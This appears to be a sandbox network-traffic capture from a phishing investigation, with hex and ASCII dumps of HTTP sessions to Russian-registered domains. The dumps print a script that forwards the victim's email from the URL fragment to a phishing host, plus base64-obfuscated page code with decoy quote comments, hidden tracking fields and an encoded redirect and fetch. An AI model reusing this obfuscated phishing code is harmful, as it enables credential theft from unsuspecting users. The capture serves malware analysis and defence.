                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                        content-length: 204
                                                                                                        date: Fri, 04 Oct 2024 13:11:35 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-10-04 13:11:35 UTC204INData Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 66 72 61 67 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 66 72 61 67 6d 65 6e 74 20 3d 20 66 72 61 67 6d 65 6e 74 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 27 40 27 29 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 39 77 45 54 6a 44 41 2e 6e 69 61 76 65 72 65 69 6e 68 6f 2e 72 75 2f 51 54 6e 41 72 74 34 2f 23 44 27 20 2b 20 66 72 61 67 6d 65 6e 74 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                        Data Ascii: <script> var fragment = window.location.hash.substring(1); fragment = fragment.replace(/\+/g, '@'); window.location.href = 'https://9wETjDA.niavereinho.ru/QTnArt4/#D' + fragment; </script>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.1649748188.114.97.34431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:37 UTC703OUTGET /QTnArt4/ HTTP/1.1
                                                                                                        Host: 9wetjda.niavereinho.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Referer: https://hollandco.athrikasih.com/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:38 UTC1022INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:38 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: no-cache, private
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mwRu9CC5erC0L19c1DuTcfHmJemgiAD6FuDMTswHjRMcX9tANuwNVZF6XZl%2Bna7TdSbdK94STe%2FUGvWb%2BpaSW3G8D2alPsNOK%2FiVCddY3ST0G%2B0K52U41Hwb0yRzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IjZiRnNtZGtDMWxSUUw4YmVUVUtsSGc9PSIsInZhbHVlIjoicjduYlRSWjlrUFB6WGNkR1BZazBWRXpZV21DTDhsZnBOSVVraVFsMVZnazVrNWFVTXorTEova2dpSmQ3NVQ5bmthN09JUDMxc1ZDck92WUF4ejJRb2k4K0c1ZjBCUWJ1STBwZitPZURJQ0NENXF6RjZ4Qml2eldya3BERi9qQmYiLCJtYWMiOiJlOTI2MDkzYWI1MzUxNDYyNDBjYmUwMWMzZjIxOTc3ZjAxZGUwYjkzMTY5ZGM2MTU1N2IwOGI3MGEyZDA5ZGZkIiwidGFnIjoiIn0%3D; expires=Fri, 04-Oct-2024 15:11:37 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                        2024-10-04 13:11:38 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 4e 56 4d 30 46 31 61 6c 4e 6e 4b 31 68 54 56 56 68 57 62 47 4e 4f 57 48 5a 78 4e 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 30 31 70 64 6b 78 76 62 46 4a 4d 55 30 74 4b 57 6b 64 71 54 48 68 4a 53 6b 68 6f 51 55 64 69 56 6e 64 53 63 33 52 4c 4f 47 46 5a 4f 44 52 4a 64 31 64 44 57 48 68 72 52 46 68 47 5a 32 70 6c 4d 6a 42 44 65 47 56 53 53 45 68 56 63 47 70 42 64 6d 56 74 4d 46 4e 35 4d 6c 64 6d 61 47 77 77 63 45 74 48 63 6e 64 68 56 43 39 78 55 6d 70 51 62 56 42 6e 54 54 68 4b 55 47 4d 34 52 31 6c 4b 54 46 41 30 62 6b 4a 4b 5a 47 31 4c 4f 55 31 73 4d 47 52 53 51 55 56 55 65 6b 4e 30 54 55 39 44 54 6b 63 77 62 6e 45 72 53 57 30
                                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InNVM0F1alNnK1hTVVhWbGNOWHZxNUE9PSIsInZhbHVlIjoiY01pdkxvbFJMU0tKWkdqTHhJSkhoQUdiVndSc3RLOGFZODRJd1dDWHhrRFhGZ2plMjBDeGVSSEhVcGpBdmVtMFN5MldmaGwwcEtHcndhVC9xUmpQbVBnTThKUGM4R1lKTFA0bkJKZG1LOU1sMGRSQUVUekN0TU9DTkcwbnErSW0
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 34 36 35 33 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 62 65 20 61 66 72 61 69 64 20 74 6f 20 67 69 76 65 20 75 70 20 74 68 65 20 67 6f 6f 64 20 74 6f 20 67 6f 20 66 6f 72 20 74 68 65 20 67 72 65 61 74 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 66 69 6e 61 6c 2c 20 66 61 69 6c 75 72 65 20 69 73 20 6e 6f 74 20 66 61 74 61 6c 3a 20 49 74 20 69 73 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 74 68 61 74 20 63 6f 75 6e 74 73 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 61 62 73 65 6e 63 65 20 6f 66 20 66 61 69 6c 75 72 65 3b 20 69 74 26 23 30 33 39 3b 73 20 74 68 65 20 70 65 72 73 69 73 74 65 6e 63 65 20 74 68
                                                                                                        Data Ascii: 4653... Don&#039;t be afraid to give up the good to go for the great. -->... Success is not final, failure is not fatal: It is the courage to continue that counts. --><script>/* Success is not the absence of failure; it&#039;s the persistence th
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 64 4d 64 6d 52 59 56 6c 68 4f 54 6c 55 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 52 30 78 32 5a 46 68 57 57 45 35 4f 56 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 64 4d 64 6d 52 59 56 6c 68 4f 54 6c 55 75 59 32 39 75 64 47 46 70 62 6d 56 79 65 33 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a
                                                                                                        Data Ascii: aDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0dMdmRYVlhOTlUgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojR0x2ZFhWWE5OVSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0dMdmRYVlhOTlUuY29udGFpbmVye3dpZHRoOiAxMDAlO3BhZGRpbmctcmlnaHQ6IHZ
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 32 4e 6c 63 33 4d 67 61 58 4d 67 5a 6d 6c 75 5a 47 6c 75 5a 79 42 7a 59 58 52 70 63 32 5a 68 59 33 52 70 62 32 34 67 61 57 34 67 5a 32 6c 32 61 57 35 6e 49 47 45 67 62 47 6c 30 64 47 78 6c 49 47 31 76 63 6d 55 67 64 47 68 68 62 69 42 35 62 33 55 67 64 47 46 72 5a 53 34 67 4c 53 30 2b 43 6a 78 69 62 32 52 35 49 48 4e 30 65 57 78 6c 50 53 4a 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 59 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 59 6d 46 6a 61 32 64 79 62 33 56 75 5a 43 31 6a 62 32 78 76 63 6a 6f 67 49 32 5a 6d 5a 6a 74 6a 62 32 78 76 63 6a 6f 67 49 7a 41 77 4d 44 74 77 59 57 52 6b 61 57 35 6e 4f 69 41 79 4d 48 42 34 4f 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 68 77 65 44 74 76 64 6d 56 79 63 32 4e 79 62 32 78 73
                                                                                                        Data Ascii: 2Nlc3MgaXMgZmluZGluZyBzYXRpc2ZhY3Rpb24gaW4gZ2l2aW5nIGEgbGl0dGxlIG1vcmUgdGhhbiB5b3UgdGFrZS4gLS0+Cjxib2R5IHN0eWxlPSJmb250LWZhbWlseTogYXJpYWwsIHNhbnMtc2VyaWY7YmFja2dyb3VuZC1jb2xvcjogI2ZmZjtjb2xvcjogIzAwMDtwYWRkaW5nOiAyMHB4O2ZvbnQtc2l6ZTogMThweDtvdmVyc2Nyb2xs
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 73 67 61 57 34 67 64 47 68 6c 49 48 52 79 65 57 6c 75 5a 79 77 67 62 6d 39 30 49 48 52 6f 5a 53 42 30 63 6d 6c 31 62 58 42 6f 4c 69 41 74 4c 54 34 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 61 55 39 4e 59 33 68 33 64 6c 42 51 55 53 49 2b 44 51 70 46 62 6e 4e 31 63 6d 6c 75 5a 79 42 35 62 33 56 79 49 48 4e 68 5a 6d 56 30 65 53 42 33 61 58 52 6f 49 47 4a 79 62 33 64 7a 5a
                                                                                                        Data Ascii: sgaW4gdGhlIHRyeWluZywgbm90IHRoZSB0cml1bXBoLiAtLT4KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iaU9NY3h3dlBQUSI+DQpFbnN1cmluZyB5b3VyIHNhZmV0eSB3aXRoIGJyb3dzZ
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 33 56 6d 74 6e 54 32 46 6f 55 7a 67 30 51 31 6c 6b 4d 6a 4a 69 53 6e 6b 79 52 55 70 58 62 31 6c 35 56 6d 70 35 63 47 68 53 53 6e 52 50 57 55 35 35 4e 57 74 4e 5a 48 56 75 57 6d 59 78 62 58 56 4f 63 6d 70 44 56 7a 46 43 4c 6e 52 79 59 57 35 7a 5a 57 35 70 62 43 35 79 64 53 39 79 63 6d 56 76 65 6d 39 35 64 47 68 6a 64 6e 6c 6d 61 57 4e 79 53 46 52 6a 62 47 78 56 56 31 4a 4d 53 30 39 55 55 45 5a 53 53 6b 74 4e 56 31 70 61 51 6c 4a 59 55 55 4a 49 57 46 52 45 56 46 64 5a 55 55 34 6e 4c 43 42 37 44 51 6f 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 52 30 56 55 49 69 77 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32
                                                                                                        Data Ascii: 3VmtnT2FoUzg0Q1lkMjJiSnkyRUpXb1l5Vmp5cGhSSnRPWU55NWtNZHVuWmYxbXVOcmpDVzFCLnRyYW5zZW5pbC5ydS9ycmVvem95dGhjdnlmaWNySFRjbGxVV1JMS09UUEZSSktNV1paQlJYUUJIWFREVFdZUU4nLCB7DQogICAgbWV0aG9kOiAiR0VUIiwNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICByZXR1cm4gcmVzcG9uc2
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 6f 47 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0d 0a 56 75 45 6c 51 73 5a 4e 6f 47 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 56 75 45 6c 51 73 5a 4e 6f 47 29 3b 0d 0a 2f 2a 20 54 72 79 20 6e 6f 74 20 74 6f 20 62 65 63 6f 6d 65 20 61 20 6d 61 6e 20 6f 66 20 73 75 63 63 65 73 73 2e 20 52 61 74 68 65 72 20 62 65 63 6f 6d 65 20 61 20 6d 61 6e 20 6f 66 20 76 61 6c 75 65 2e 20 2a 2f 0d 0a 7d 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 35 64 30 56 55 61 6b 52 42 4c 6d 35 70 59 58 5a 6c 63 6d 56 70 62 6d 68 76 4c 6e 4a 31 4c 31 46 55 62 6b 46 79 64 44 51 76 22 29 20 21 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 63 6f 6e 73 74 20 76 6c 70 75 76 49 59 67 6c 6b 20 3d
                                                                                                        Data Ascii: oG = document.currentScript;VuElQsZNoG.parentNode.removeChild(VuElQsZNoG);/* Try not to become a man of success. Rather become a man of value. */}if(atob("aHR0cHM6Ly85d0VUakRBLm5pYXZlcmVpbmhvLnJ1L1FUbkFydDQv") !== "nomatch"){const vlpuvIYglk =
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 30 59 53 42 6f 64 48 52 77 4c 57 56 78 64 57 6c 32 50 53 4a 59 4c 56 56 42 4c 55 4e 76 62 58 42 68 64 47 6c 69 62 47 55 69 49 47 4e 76 62 6e 52 6c 62 6e 51 39 49 6b 6c 46 50 55 56 6b 5a 32 55 73 59 32 68 79 62 32 31 6c 50 54 45 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 4a 76 59 6d 39 30 63 79 49 67 59 32 39 75 64 47 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c 65 43 77 67 62 6d 39 6d 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69
                                                                                                        Data Ascii: 0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCi
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 59 32 39 75 64 47 56 75 64 43 31 6a 5a 57 35 30 5a 58 4a 37 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4f 6d 4e 6c 62 6e 52 6c 63 69 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 64 4d 64 6d 52 59 56 6c 68 4f 54 6c 55 75 62 58 51 74 4e 58 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 4e 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 48 54 48 5a 6b 57 46 5a 59 54 6b 35 56 49 43 35 74 64 43 30 30 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 78 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 52 30 78 32 5a 46 68 57 57 45 35 4f 56 53 41 6a 61 55 39 4e 59 33 68 33 64 6c 42 51 55 53 42 37 59 32 39 73 62 33 49 36 49 43 4d 32 59 7a 63 31 4e 32 51 37 5a 6d 39 75 64 43 31
                                                                                                        Data Ascii: Y29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI0dMdmRYVlhOTlUubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNHTHZkWFZYTk5VIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojR0x2ZFhWWE5OVSAjaU9NY3h3dlBQUSB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1
                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 46 68 33 59 55 39 51 57 57 39 78 64 58 59 31 4d 46 42 6e 4f 57 4d 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 42 75 59 57 31 6c 50 53 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b
                                                                                                        Data Ascii: Fh3YU9QWW9xdXY1MFBnOWMiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9InBhZ2VsaW5rIiBuYW1lPSJwYWdlbGluayIgdmFsdWU9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGlwIiBuYW1lPSJibHRkaXAiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRk


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.1652635151.101.66.1374431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:38 UTC628OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://9wetjda.niavereinho.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:38 UTC613INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Age: 1998469
                                                                                                        Date: Fri, 04 Oct 2024 13:11:38 GMT
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740037-EWR
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 5889, 0
                                                                                                        X-Timer: S1728047499.671658,VS0,VE1
                                                                                                        Vary: Accept-Encoding
                                                                                                        2024-10-04 13:11:38 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2024-10-04 13:11:38 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                        2024-10-04 13:11:38 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                        2024-10-04 13:11:38 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
